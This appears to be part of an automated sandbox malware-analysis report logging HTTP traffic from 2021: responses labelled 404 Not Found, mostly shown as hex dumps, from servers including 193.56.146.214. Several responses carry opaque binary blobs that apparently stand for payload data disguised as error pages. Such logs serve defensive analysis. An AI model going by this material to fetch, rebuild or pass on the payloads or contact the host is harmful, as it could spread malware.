46 bb 2a d2 be 45 1f d0 b5 aa 7a 8f 0e 69 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a 56 63 b3 88 7d 3f dc e5 7e 3f a4 70 d4 03 bb 03 9a 76 6a 0f ca 82 c3 26 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 03 b2 27 70 10 7b 3a 1d f8 08 85 af 88 c1 a4 0e 31 25 4d db a9 c3 f8 cb 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 59 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:05 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 402Keep-Alive: timeout=5, max=98Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 33 2e 35 36 2e 31 34 36 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:05 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=97Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 34 30 30 36 61 0d 0a 00 00 6e 47 17 86 3c 28 c2 36 40 7b b6 16 56 36 0c 45 49 50 b5 c5 ea fa 80 5d 3d 4d 94 01 9f 38 c5 e4 b8 b3 1b e4 69 14 ba 72 71 2e a2 b2 43 37 3a 71 f6 aa 4d af 80 0d c2 d6 60 e5 83 44 7d 49 98 ab 99 7a d3 1e 48 2e 96 0c 59 41 c8 0f 06 51 ea 33 08 e5 01 db b9 93 51 3b a1 fd f4 43 7f 32 3d 09 67 19 00 03 ae df 8e 36 20 d7 fa a7 5c ea c3 c5 0c 90 75 ff 67 5a b4 7c e9 9f 09 79 61 ab 85 ce 60 d5 d3 ef 53 47 4d c5 9c a2 ae 7a b7 be 4f 41 dd 46 29 0a f9 36 87 18 bc 67 b1 2e 7c af 3a 05 14 a5 5d ef 3b f3 56 72 bc 3d 1a 04 b2 50 2a 87 d6 17 8f 3a fa 04 b1 07 a0 e2 19 17 80 2f ba 8e 42 0d 0a 7e 82 cf 27 11 d8 9d 1d b3 9c 88 8a 38 22 7a 6d 2e e6 2a 7e d7 3f dc 9e 2e cb 81 a8 4b 55 09 d4 c1 1e 2b 50 6b bd 8e c3 58 87 c6 41 c9 b0 26 1c 94 c0 99 7d 5a 99 2b 99 5b af 18 9f 7a 95 5f 97 a6 75 3e 1a 20 8c a3 b0 ca 79 f7 ad f5 31 61 a4 cf 37 1f 1a eb 3f ae c6 74 31 8c 8f f5 03 96 0b cd 96 df a5 61 6c fd 71 12 70 df ce 22 db 30 d5 a9 b6 2a 08 8f 01 e9 46 76 22 e1 ff b8 5c 3f 1f 83 d0 30 38 ba 60 bd 49 22 09 69 53 40 98 e3 94 54 e0 2f 60 43 8c 67 f0 86 f0 fb 34 6c 1b 45 6e d5 f6 4e 76 8c 9e cd 37 14 39 7e a2 55 6b 5f c7 ae 4a 88 54 d9 60 49 d3 03 e7 fe 88 2c 3b 4c f9 10 e5 ec 9a db 25 2f 45 75 04 c5 e3 a1 b7 d9 17 81 5d 26 db 3a 35 9d f7 d5 49 4f 44 e8 d0 32 79 2e 0a ba e8 33 ec fd 05 89 52 de 0e 63 bb d6 d4 46 d1 f2 38 df d5 bf 2b 02 87 d2 db 53 3d a0 c3 96 cb 7d 64 57 b4 85 5b ae 39 16 1b e2 99 15 f7 bb 2e 44 31 e2 08 5a 11 dc 40 b4 06 91 b1 41 6b 05 23 9f f5 4a b0 6e 78 0d 2a f7 d8 d2 12 74 3c 8b 08 f5 a5 36 3d 07 4e c4 b2 d6 ea ec 5b ab 10 a3 0b ab c1 39 e2 a7 66 94 c6 a6 d3 30 68 1e 11 b2 18 4c c1 58 40 f6 e7 2a 33 72 08 ac 78 ae 53 ff 0f 71 5f 75 56 4f 82 56 c3 e9 37 7f a3 29 ff f1 ee 21 bd b4 4f 07 bb 
75 4b 99 01 ac 67 90 ff 21 62 11 14 74 22 d5 a5 d5 93 03 e8 a9 1c 5e 68 fc b5 2c f4 47 1c 3f 4d 93 1e 60 70 06 72 52 89 52 93 3e 09 6e c1 ca 39 52 3e cc 35 5f d8 89 98 4c 97 49 94 56 ef 01 37 e2 41 44 f0 8b 65 48 8a 76 e1 41 84 8e 71 b4 0d 16 5e ea 87 04 82 cd 7d 42 fd bd 38 ad 2a 2c 3f 86 9c aa ca b7 04 d6 62 da f5 e1 c8 09 f8 66 f4 23 a4 3b ca b5 a0 83 56 84 86 76 4e 38 13 f9 77 46 05 19 a7 ae 19 17 b0 68 d3 a1 24 4f 38 6a 19 e7 66 f5 1d 33 c7 2a 09 c5 ed fc c4 23 ef 28 ef 3e 1c 2b 48 06 30 c8 0b 4c 27 c7 7d e6 c2 6a fd 20 23 71 de a1 9f 39 b0 fc f8 06 04 cd 0b dd 30 d5 71 cf d6 a3 96 5c 41 be c0 52 50 0f fb 75 d2 7a b6 d7 5b d4 77 ed f6 4b a5 53 52 d2 c7 d4 d1 79 5e 67 ad 6d 15 b0 c0 db 31 a0 29 77 39 ac b2 03 07 1e 17 76 38 bc db 58 67 4b 5b 67 e2 3f d3 78 d9 f8 1f ba a2 50 11 3b ec 5f e0 3c 47 4b d4 50 b0 20 e1 1e 34 ee d3 2e ac 9c d8 f7 0d c0 23 af 38 15 06 1f 84 48 7f 4f 6d 5b df 92 a0 cf 0b 80 51 a9 cd 6d e1 7c 1c 9d 89 05 4d 99 2e 94 58 13 86 89 b0 6e 2c dc c3 75 44 f4 8b 85 52 aa a2 e4 2f a9 e7 5b 9a 1e bd 79
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:08 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 ca 05 11 fc 86 d5 36 8c f6 c7 35 f3 73 07 03 d2 ff f9 fa fa eb b2 b9 71 cd 79 33 33 d1 60 73 45 7c 1f 57 44 63 84 be 3c 50 15 51 fe 08 a2 b9 7f 18 66 7d 28 2a a7 6a dd d6 bc db 43 15 5c 53 a6 cd f6 4d 55 62 91 54 5b fd 55 19 d0 ed c5 70 b1 17 20 58 4a ed 08 63 3e 17 21 6b df a3 06 83 3a 56 2f cb 00 23 be 52 15 d7 17 53 53 fa cb 1f 9e 0d 09 52 2b e5 8d 83 7b 7e 45 f7 ff e4 e1 55 db 8b 0d 13 13 bf 9e e1 92 08 0c 4f c5 03 a1 cb a1 61 7e de f5 69 e1 19 17 c6 4c af 9a a5 e4 c9 a0 cd b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d c0 5d bf 46 34 fd f8 12 4c 33 6c 21 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 e3 a0 f5 1a 20 9b 4a d8 19 ae cc 4f 3b 79 82 ae b2 e3 67 34 01 56 ad f3 a3 77 2a b9 72 ce cc 23 b2 3b 0e 31 79 90 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 43 11 bb b6 81 43 4f 55 b7 69 b7 9f 1f cd cc 46 d9 c8 15 ac af ed d9 55 3d ff ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 26 e7 ac 44 06 f6 27 2c 18 f8 c7 9b 88 e7 3d 66 f1 2a 64 b1 1d 32 12 51 8c 26 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 0e a1 54 17 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 1e 54 ab 1e f6 11 11 ee c3 ce 57 a3 04 1d 85 1f d6 5c 6d 91 cc 62 06 f1 60 7f ae 03 58 e5 1d e4 a4 7d 10 99 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 
7a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 80 8a 49 37 03 80 e3 1c cd 20 f5 52 b7 3b 3a 96 f5 cb e7 17 3f dc e5 7e 0d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 98 3a 1d f8 4e b5 14 86 c1 70 a8 fe 04 c5 db ad 0e c9 9c 47 a2 91 29 98 f9 4c 79 de 79 d5 57 d0 6f fd ef 76 67 a8 db e9 d5 6a e2 3c 99 a8 84 be 57 a7 eb 6c 28 8e 94 16 a3 4e d4 e7 23 b2 52 dc 1a 9e 8b 18 07 64 01 7d 46 02 82 96 c6 ce 2d b2 9d df 3c 42 56 60 de 9e 93 0f 94 45 a9 24 4f 78 60 22 30 5f d6 a0 b8 78 fe b1 8e 98 37 20 5e 32 d0 c9 f3 32 42 82 39 16 12 47 0b f9 17 30 8d e3 51 22 b2 3d df 10 54 5a 17 1c 5c 5a 12 b3 19 5f 11 8f 69 f9 e4 b9 2a 01 6e f3 fd 58 b3 dc 95 25 1f 90 13 f7 5e 15 23 b5 01 92 e3 92 c2 01 7d 7e d3 95 bc 43 cf 76 62 93 55 e1 05 85 d4 9c 97 2e 60 10 3a 93 83 ac e5 fe 99 ae 32 c8 6e 95 8d 4a d5 f8 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 fb 37 67 d2 1f ad af a2 e2 54 24 d0 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:09 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 402Keep-Alive: timeout=5, max=96Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 33 2e 35 36 2e 31 34 36 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:09 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=95Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 37 63 63 30 32 0d 0a 00 00 6e 47 17 86 3c 28 c2 36 40 7b b6 16 56 36 0c 45 49 50 b5 c5 ea fa 80 5d 3d 4d 94 01 9f 38 c5 e4 b8 b3 1b e4 69 14 ba 72 71 2e a2 b2 43 37 3a 71 f6 aa 4d af 80 0d c2 d6 60 e5 83 44 7d 49 98 ab 99 7a d3 1e 48 2e 96 0c 59 41 c8 0f 06 51 ea 33 08 e5 01 db b9 93 51 3b a1 fd f4 43 7f 32 3d 09 67 19 00 03 ae df 8e 36 20 d7 fa a7 5c ea c3 c5 0c 90 75 ff 67 5a b4 7c e9 9f 09 79 61 ab 85 ce 60 d5 d3 ef 53 47 4d c5 7c a2 52 90 b7 be 4f 41 dd 46 29 0a f9 36 87 18 bc 67 b1 2e 7c f9 3e 05 14 73 5e ef 3b f3 56 72 70 6e 1e 04 b2 50 2a 87 d6 37 83 3a fa 04 b1 07 a0 e2 19 17 80 2f ba 8e 42 0d 0a 7e 82 cf 27 11 da 9d 1d b3 9c 88 8a 38 22 7a 61 2e e6 2a 7e d7 46 ad 96 2e cb 81 88 4b 55 09 d4 c1 1e 2b 50 6b bd 8e c3 58 87 c6 41 c9 b0 26 1c 94 c0 99 7d 5a 99 2b 99 5b af 18 9f 7a bd 0c 93 a6 69 3e 1a 20 8c 63 bb ca c9 ba ad f5 31 61 a4 cf 37 1f 1a eb 3f 82 c2 74 e1 81 8f f5 03 96 07 cd 96 df a5 61 6c fd 71 12 70 df ce 22 db 30 d5 a9 b6 2a 08 8f 01 e9 46 76 22 e1 ff b8 5c 3f 1f 83 d0 30 38 ba 60 bd 49 22 09 69 53 40 98 e3 94 54 e0 2f 60 43 8c 67 f0 86 f0 fb 34 6c 1b 45 6e d5 f6 4e 76 8c 9e cd 37 14 39 7e a2 55 6b 5f c7 ae 4a 88 54 d9 60 49 d3 03 e7 fe 88 2c c7 1f fd 10 e5 ec 9a db 25 79 41 75 04 c5 e3 a1 b7 d9 17 81 5d 26 db 3a 35 9d f7 d5 49 4f 44 e8 d0 32 79 2e 0a ba e8 33 5c b0 05 89 52 1e 05 63 bb 9a d4 46 d1 a0 3c df d5 bf 2b 02 87 d2 db 53 3d a0 c3 96 cb 7d 64 57 b4 85 5b ae 39 16 1b e2 99 15 f7 bb 2e 44 3d e2 08 5a 11 dc 40 9e 02 91 b1 41 6b 05 23 9f f5 4a b0 6e 78 0d 2a f7 d8 d2 12 74 3c 8b 08 f5 a5 36 3d 07 4e c4 b2 d6 ea ec 0f f8 14 a3 0b ab c1 39 e2 a7 66 94 c6 a6 d3 30 18 65 17 b2 f4 a7 c1 58 40 f6 e7 2a 9d 72 08 ac 54 7b 52 ff eb 48 5a 75 56 4f 82 56 c3 e9 37 7f a3 29 ff f1 ee 21 bd b4 4f 07 bb 
75 4b 99 01 ac 67 90 ff 21 62 11 14 74 22 d5 a5 d5 93 03 e8 a9 51 04 f8 fc b7 2c f4 47 1b 3f 4d 93 e6 9f 70 06 c5 52 89 52 8c 3e 09 6e be ca 39 52 41 cc 35 5f 27 89 98 4c 68 48 94 56 10 02 37 e2 be 43 f0 8b 9a 47 8a 76 1e 5e 84 8e 8e 8b 0d 16 21 95 87 04 73 2d c7 4c 02 f6 30 60 f4 6b 3d 82 ae 74 99 df 92 5a 4d aa 78 71 b0 7b 66 f4 eb 40 3a aa db da 2b 5c cb e1 59 fb c4 57 cc 6f e6 65 be a9 0b 89 8b 87 2b 02 02 53 d6 5a e3 95 e6 d8 99 0a e2 4c 97 6f 09 c5 e9 fd c7 23 56 3e ec ab 1c 2b 48 06 30 c8 0b 4c c7 c7 5f c6 c9 6b ad 20 23 6b de a1 9f 3f b0 fc f8 06 04 cd 51 e5 30 d5 71 ef d6 a3 96 1c 41 be c0 52 50 1f fb 55 d2 7a b6 d5 5b d4 72 ed f6 4b a5 53 52 d2 c1 d4 d1 79 5e 67 ad 6d 11 30 c0 db 31 a2 29 77 31 ac b2 03 04 1e 57 f3 28 bc cb 58 67 5b 5b 67 c2 3f c3 78 d9 e8 1f ba e2 50 11 3b fc 5f e0 3c c7 4b d4 50 b0 20 e1 1e 3c d7 d3 2e e3 9c d8 f7 0d 82 23 af 40 16 06 1f 84 4c 7f 4f 6d 5b df 92 a0 c7 0b 80 51 a9 cd 6d e1 0c 1c 9d 89 05 4d 99 20 83 58 13 87 89 b0 6e 2c 9c c3 75 44 f4 8b 85 52 2a a2 e4 2f a9 e7 5b 9a 1e bc 79
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:11 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 40 26 0b 04 59 b9 1d 6d f5 e9 e6 a1 29 7a 3a 62 c3 cc a7 43 ec 44 d7 6b 50 78 18 e0 30 8a 3c a2 61 a3 d6 d4 22 a2 58 d5 5b 2d 22 ad 88 88 5e 6f d7 9f b7 ee bc db 32 b9 9a 4c ca 4c 08 03 d4 d2 a1 97 c6 37 13 4b 42 c4 d4 5a c6 ca 23 e8 16 41 bf 6c 13 d9 c8 9f 57 db 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 56 2b 88 b6 4b 24 7e 45 f7 ff 78 8d 55 db 24 0d 11 12 b4 1f eb 92 24 82 45 c5 03 49 bd a3 61 7e de f5 69 33 11 17 7e 4f af 9a a5 e4 c3 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b 11 41 48 9a 07 fd ec 23 20 77 ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 d5 20 c6 4f 6b 79 82 ae 9c a7 82 4e 95 1f ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df 75 6c e5 ee 30 4c 80 f0 00 f9 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 9a 70 f7 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 bb 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 39 07 bd 1b 6f d3 cb 29 32 a2 ed 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 13 61 6a e6 a6 dd 1a 9f 10 af d9 b0 99 89 93 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fa b0 92 48 a9 b4 bb e1 
33 17 28 d2 9e c6 1d d0 eb aa 7a 8f 52 61 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a d6 63 b9 82 7b 50 bf e5 7e 75 82 71 d4 03 6b 2c 9a 76 48 0e ca 82 21 2f 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 01 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac 